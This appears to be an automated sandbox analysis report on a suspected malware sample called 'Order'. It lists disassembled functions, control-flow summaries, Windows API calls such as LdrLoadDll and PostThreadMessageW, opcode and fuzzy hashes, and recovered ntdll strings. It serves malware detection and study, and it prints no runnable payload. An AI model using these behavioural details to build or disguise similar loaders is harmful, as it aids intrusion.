                                                                control_flow_graph 91 417793-4177af 92 4177b7-4177bc 91->92 93 4177b2 call 42f323 91->93 94 4177c2-4177d0 call 42f923 92->94 95 4177be-4177c1 92->95 93->92 98 4177e0-4177f1 call 42dd83 94->98 99 4177d2-4177dd call 42fbc3 94->99 104 4177f3-417807 LdrLoadDll 98->104 105 41780a-41780d 98->105 99->98 104->105
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                • Instruction ID: 8c201cb86210103d8ff0389f06be1b6184587a7a4bbc6cbf00069c90d1d8dc7c
                                                                • Opcode Fuzzy Hash: 398b2a412e78966941bbc00af36c1ba151ff0cffd571e2978ca56ccaa8df4b4d
                                                                • Instruction Fuzzy Hash: F3015EB5E0020DBBDB10DAE1DC42FDEB7789B14308F4041AAE91897280FA34EB488B95
                                                                Function 0042C633 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 121 42c633-42c66c call 4047d3 call 42d873 NtClose
                                                                APIs
                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C667
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0
                                                                • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction ID: c58c7d579e4e2bacd6c01519c7e0221e1a66a8a060063ee453bb1f2e55cecb1d
                                                                • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                • Instruction Fuzzy Hash: 67E0D632600204BBE220AA5AEC02F8BB3ACCBC5714F00401AFA0CA7242C270B91086F5
                                                                Function 01A02B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: b82617884ee865f82e506ad5700e6e67bfef89da3d41816c4238568f30188b7b
                                                                • Instruction ID: c83dc4205a9ccc2488157488bce9782db904f394fe0b48f070175f04bc6e7173
                                                                • Opcode Fuzzy Hash: b82617884ee865f82e506ad5700e6e67bfef89da3d41816c4238568f30188b7b
                                                                • Instruction Fuzzy Hash: 9F90026224240003410571584414616500A97E1241F56C021E1014590DC62989916225
                                                                Function 01A02DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: e9159239d80417a94c17588b300123383085cb77d68ecb8baed3917e245efb3a
                                                                • Instruction ID: deb40ab89a5b528aba9c3b2524e557e55b7961feaec6c069938ddd173c0741e7
                                                                • Opcode Fuzzy Hash: e9159239d80417a94c17588b300123383085cb77d68ecb8baed3917e245efb3a
                                                                • Instruction Fuzzy Hash: 8390023224140413D11171584504707100997D1281F96C412A0424558DD75A8A52A221
                                                                Function 01A02C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: fbe00a3b480d2bf76781e3d244b4831350fa0c052067c31c7f644dea76526c51
                                                                • Instruction ID: 08c036d7fe9aadb34272fa107234c4482d69658f048fc41578896e15570820e4
                                                                • Opcode Fuzzy Hash: fbe00a3b480d2bf76781e3d244b4831350fa0c052067c31c7f644dea76526c51
                                                                • Instruction Fuzzy Hash: 3D90023224148803D1107158840474A100597D1341F5AC411A4424658DC79989917221
                                                                Function 01A035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: 5f9ca542dc688b55e0e6b840179443d0bd97e7d5e94e1af4e36c77b53477aa2a
                                                                • Instruction ID: 96ba6c4b2d6d3e3d719a8c08a3b791630517078f0efd4811a7bf73b89d405685
                                                                • Opcode Fuzzy Hash: 5f9ca542dc688b55e0e6b840179443d0bd97e7d5e94e1af4e36c77b53477aa2a
                                                                • Instruction Fuzzy Hash: EB90023264550403D10071584514706200597D1241F66C411A0424568DC7998A5166A2
                                                                Function 00413FBB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 1836367815-3456940251
                                                                • Opcode ID: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                                • Instruction ID: 874110b21b3390a429e1172821fe310f6061561dc3fbdce207ccc568e88ba2fc
                                                                • Opcode Fuzzy Hash: 6713828af27b9a14103d79dc9fc153ece541dbdb8ee11a634a09a0ce15b46ceb
                                                                • Instruction Fuzzy Hash: 06115972E002587BDB119AE28C41DEFBB7DAF81358F04805AF90467241D2784E4747A5
                                                                Function 00414023 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(0349A-n,00000111,00000000,00000000), ref: 0041409A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 1836367815-3456940251
                                                                • Opcode ID: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                                • Instruction ID: c1e20e2142e366b389da3563046297cec7b91a3900e043a758beaaf28deb081d
                                                                • Opcode Fuzzy Hash: a67216cafba27e371a777059a0c701bbd68fdb8531e596d5aeb488d9f34b04ad
                                                                • Instruction Fuzzy Hash: 0A01DB71E0021C7AEB10ABD19C81DEF7B7CEF81798F448069FA0467141D6785E0647A5
                                                                Function 00413FDF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 30 413fdf-413feb 30->30 31 413fed-413ff0 30->31 32 414053-414055 31->32 33 413ff2-413ffc 31->33 34 41405b-41408d call 404743 call 424e93 32->34 35 414056 call 417793 32->35 33->32 40 4140ad-4140b3 34->40 41 41408f-41409e PostThreadMessageW 34->41 35->34 41->40 42 4140a0-4140aa 41->42 42->40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0349A-n$0349A-n
                                                                • API String ID: 0-3456940251
                                                                • Opcode ID: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                                • Instruction ID: bd3507925f1ca423312bb13a029e2d8f4e8582ed727c1f867d54eba86e7c9970
                                                                • Opcode Fuzzy Hash: 47d999306225662355c300520733858812152cc495b1a1c6fad14eda91b693b9
                                                                • Instruction Fuzzy Hash: 0A0147B6A01249BEDB105BA24C81CEF7B7DDED2758B048066F904E7241D6784E4647BA
                                                                Function 0042C993 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 43 42c993-42c9d4 call 4047d3 call 42d873 RtlFreeHeap
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C9CF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID: =eA
                                                                • API String ID: 3298025750-3399696693
                                                                • Opcode ID: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction ID: 5bf54a144608e309584a604ebbd06080e81bb27e9496a35fdb293cb900648e28
                                                                • Opcode Fuzzy Hash: 2c7d0e8fa14e5537e8920ab20e4117eb7134f7dcb1150b0d78b0cb26355729ad
                                                                • Instruction Fuzzy Hash: EDE065B66143047BD610EE9AEC45FAB33ACEFC9750F00441AFA19A7242D770BD118BB9
                                                                Function 0042C943 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 116 42c943-42c984 call 4047d3 call 42d873 RtlAllocateHeap
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(?,0041E57E,?,?,00000000,?,0041E57E,?,?,?), ref: 0042C97F
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0
                                                                • Opcode ID: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                                • Instruction ID: 6c94c9b0a68df69252c11d37fe3a6ed2ea0c874f6190d84ced6cb7a8f7b23c15
                                                                • Opcode Fuzzy Hash: 7b7813cea5ecf29619ebb5f332fdfad85baad263fae7f034d9bc4f129238223b
                                                                • Instruction Fuzzy Hash: 6EE06DB16042047BD610EE59DC81F9B37ADEFC5714F004019FA1CA7241C674B9108AB9
                                                                Function 00417786 Relevance: 1.5, APIs: 1, Instructions: 29libraryloaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 106 417786-4177d0 108 4177e0-4177f1 call 42dd83 106->108 109 4177d2-4177dd call 42fbc3 106->109 114 4177f3-417807 LdrLoadDll 108->114 115 41780a-41780d 108->115 109->108 114->115
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417805
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0
                                                                • Opcode ID: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                                • Instruction ID: 5e67de2430df7b926fa19ab7142ee4ef2541c361e8587618277fac3dc212a9f4
                                                                • Opcode Fuzzy Hash: 8aef7e6dee978ff0a08f23e338e06f373b0ad360bf5dbdfaa9cc84fad5eece04
                                                                • Instruction Fuzzy Hash: D8F0A7B5E04109ABCB11DBD0DC52FEEB7749F04304F108297F5189A280F535EB45CB55
                                                                Function 0042C9E3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 126 42c9e3-42ca1c call 4047d3 call 42d873 ExitProcess
                                                                APIs
                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,089F3F9E,?,?,089F3F9E), ref: 0042CA17
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1781980018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_400000_Order.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0
                                                                • Opcode ID: fdc901fa64855fd1b6121672eb0d8bf45718e0c92ca995efb245744b1db379a0
                                                                • Instruction ID: 275eb0913eeab179cd74e56bdad212bd26511b8cc7a058f77c00c70800628c04
                                                                • Opcode Fuzzy Hash: fdc901fa64855fd1b6121672eb0d8bf45718e0c92ca995efb245744b1db379a0
                                                                • Instruction Fuzzy Hash: 6FE046766102147BD220BA9ADC41FDBB7ACDBC9754F00445AFA18A7242C7B0B91086EA
                                                                Function 01A02C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 131 1a02c0a-1a02c0f 132 1a02c11-1a02c18 131->132 133 1a02c1f-1a02c26 LdrInitializeThunk 131->133
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                • Opcode ID: a6ed88fd8685236942a352d4f654261eac4a3a74ee4915d384a11aa7885bfeec
                                                                • Instruction ID: 73836d67cb56048d052a7b918ce909f0157fab202904641d4b7d10109320ed03
                                                                • Opcode Fuzzy Hash: a6ed88fd8685236942a352d4f654261eac4a3a74ee4915d384a11aa7885bfeec
                                                                • Instruction Fuzzy Hash: 39B09B729415C5C6DA12E764560C717790077D1741F16C076D2030685F873CC5D1E275

                                                                Non-executed Functions

                                                                Function 01A42349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2160512332
                                                                • Opcode ID: bcb84e11420f8440e3fb10691a5e7408bef4756b9e8cb2bc36948a2156c4aa52
                                                                • Instruction ID: b64f41a8d92f1ea5856ae266012b00a4d989ede241e4412f521ec2bbd7817853
                                                                • Opcode Fuzzy Hash: bcb84e11420f8440e3fb10691a5e7408bef4756b9e8cb2bc36948a2156c4aa52
                                                                • Instruction Fuzzy Hash: 42927D71604742ABE721DF29D880B6BBBE8BFC4754F04492EFA98D7251D770E844CB92
                                                                Function 019F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A354CE
                                                                • corrupted critical section, xrefs: 01A354C2
                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01A35543
                                                                • Critical section debug info address, xrefs: 01A3541F, 01A3552E
                                                                • Address of the debug info found in the active list., xrefs: 01A354AE, 01A354FA
                                                                • 8, xrefs: 01A352E3
                                                                • Critical section address., xrefs: 01A35502
                                                                • undeleted critical section in freed memory, xrefs: 01A3542B
                                                                • Critical section address, xrefs: 01A35425, 01A354BC, 01A35534
                                                                • Thread identifier, xrefs: 01A3553A
                                                                • double initialized or corrupted critical section, xrefs: 01A35508
                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A3540A, 01A35496, 01A35519
                                                                • Invalid debug info address of this critical section, xrefs: 01A354B6
                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A354E2
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                • API String ID: 0-2368682639
                                                                • Opcode ID: e2d11023c162b62ea0776ac9cad5023aea702ca9b671a9b55eefd4c83112cfdf
                                                                • Instruction ID: 688fd17f129f5799e35cd85bafd9afe0c5e26eea55a6013a55372c5b9ba6f67d
                                                                • Opcode Fuzzy Hash: e2d11023c162b62ea0776ac9cad5023aea702ca9b671a9b55eefd4c83112cfdf
                                                                • Instruction Fuzzy Hash: B1819CB0E40348AFDB20CF99C845BAEBBF9BB88B15F544119F508B7281D775A945CB90
                                                                Function 019F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 01A3261F
                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A32602
                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A32409
                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A325EB
                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A32498
                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A32624
                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A32506
                                                                • @, xrefs: 01A3259B
                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A32412
                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A324C0
                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A322E4
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                • API String ID: 0-4009184096
                                                                • Opcode ID: f3a23a3b8103b2551ccb9e788edf35d186966a84ac52bf0589a80c53d8e7b074
                                                                • Instruction ID: 2345c77c5c87ea8bb34158519f3cf55298016c0f9f1e70431a698f64e9a4d9e3
                                                                • Opcode Fuzzy Hash: f3a23a3b8103b2551ccb9e788edf35d186966a84ac52bf0589a80c53d8e7b074
                                                                • Instruction Fuzzy Hash: DC0260B1D00229AFDB21DB54CD80B99B7B8AF94704F4041EAA74DA7241DB31AF84CF99
                                                                Function 01A68B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                • API String ID: 0-2515994595
                                                                • Opcode ID: e712e2147275c7e8ad259c7cf15981d2122ffce32547162b251c7854f2aca940
                                                                • Instruction ID: 05158d8af8d4fb6823b2097af688cbfcbe60bda60e15c1e33ac98642bb71b1ca
                                                                • Opcode Fuzzy Hash: e712e2147275c7e8ad259c7cf15981d2122ffce32547162b251c7854f2aca940
                                                                • Instruction Fuzzy Hash: 4051E1715143019FC729DF598884BABBBECFF98340F14091DEA99C7284E778D508CBA2
                                                                Function 01A70274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                • API String ID: 0-1700792311
                                                                • Opcode ID: 51278f8268b1fd9aceda0ae735d3e9c24517ff2f1fb08c4e66b32b3256e2cc5c
                                                                • Instruction ID: 89198bedde5a0f615b793aabfc062058a14a07bad7ac3522cf8e64f98ffcaadc
                                                                • Opcode Fuzzy Hash: 51278f8268b1fd9aceda0ae735d3e9c24517ff2f1fb08c4e66b32b3256e2cc5c
                                                                • Instruction Fuzzy Hash: 9ED1F435500685DFDB22DF69CA90AAEFBF1FF8A714F088059F54A9B252C734DA81CB14
                                                                Function 01A489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • VerifierDlls, xrefs: 01A48CBD
                                                                • HandleTraces, xrefs: 01A48C8F
                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A48A3D
                                                                • VerifierDebug, xrefs: 01A48CA5
                                                                • AVRF: -*- final list of providers -*- , xrefs: 01A48B8F
                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A48A67
                                                                • VerifierFlags, xrefs: 01A48C50
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                • API String ID: 0-3223716464
                                                                • Opcode ID: e17a4a95f3861c928942ab165518311b0b0ecf9620a6dce40cf4867ba0ace3fd
                                                                • Instruction ID: 0184d8bc376cd22d6ddd905045fb4e594554b6f366e8e1c80947446865a1862c
                                                                • Opcode Fuzzy Hash: e17a4a95f3861c928942ab165518311b0b0ecf9620a6dce40cf4867ba0ace3fd
                                                                • Instruction Fuzzy Hash: BA912771A46342AFD722DFA8E8C0B6B77E8BBD4714F09041CFA496B252C778AC05C795
                                                                Function 019CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                • API String ID: 0-1109411897
                                                                • Opcode ID: 0d76c67937ff19b3385bb9713df6cd885a228cfbd082d2fb77d209f0fd1f9327
                                                                • Instruction ID: 2317c5a6cb15eb3e2f75c2d0c088bc592f76f178e857cd073dd0b97b08670730
                                                                • Opcode Fuzzy Hash: 0d76c67937ff19b3385bb9713df6cd885a228cfbd082d2fb77d209f0fd1f9327
                                                                • Instruction Fuzzy Hash: EFA24974A0562A8FDB64CF19CD88BA9BBB5BF89704F1442EDD94DA7251DB309E80CF01
                                                                Function 019F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-792281065
                                                                • Opcode ID: ef79dca4781939699b72073d84a3c432d03478da68d8e8a27ef384f01fdf5fbe
                                                                • Instruction ID: 174b5f7e24e6eb1986d9cd5f29cead2cf17e191407b93532338a0d3b8825abea
                                                                • Opcode Fuzzy Hash: ef79dca4781939699b72073d84a3c432d03478da68d8e8a27ef384f01fdf5fbe
                                                                • Instruction Fuzzy Hash: 42914930F00751ABEB35EF58D984BAA7BA5BFC5B24F04012DFA087B292D7749842C790
                                                                Function 019B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • apphelp.dll, xrefs: 019B6496
